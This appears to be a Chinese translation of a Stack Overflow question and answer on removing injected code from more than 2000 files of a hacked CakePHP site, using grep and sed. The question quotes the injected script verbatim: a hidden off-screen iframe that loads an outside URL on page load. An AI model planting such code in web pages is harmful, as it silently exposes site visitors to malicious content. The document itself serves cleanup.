linux - 需要使用linux命令删除cakephp脚本中的病毒代码

昨天我的网站被黑客入侵，其代码如下:

<script>
    function frmAdd() {
        var ifrm = document.createElement('iframe');
        ifrm.style.position='absolute';
        ifrm.style.top='-999em';
        ifrm.style.left='-999em';
        ifrm.src = \"http://fenwaywest.com/media/index.php\";
        ifrm.id = 'frmId';
        document.body.appendChild(ifrm);
    };
    window.onload = frmAdd;
</script>";

当我使用以下命令搜索服务器以查找受影响的文件时

grep -r "<script>  function frmAdd()" /path/

我有2000多个文件。

现在，我只需要删除该行。拜托，有人可以指导该命令仅在所有2000个文件中删除该行吗？

最佳答案

先备份!然后，您可以尝试如下操作:

grep -lr " function frmAdd" /path/ | xargs sed -i '/ function frmAdd/d'

这将删除与该正则表达式匹配的所有行。它还假设路径不包含空格(希望这里是一个合理的假设)。

关于linux - 需要使用linux命令删除cakephp脚本中的病毒代码，我们在Stack Overflow上找到一个类似的问题：https://stackoverflow.com/questions/12820020/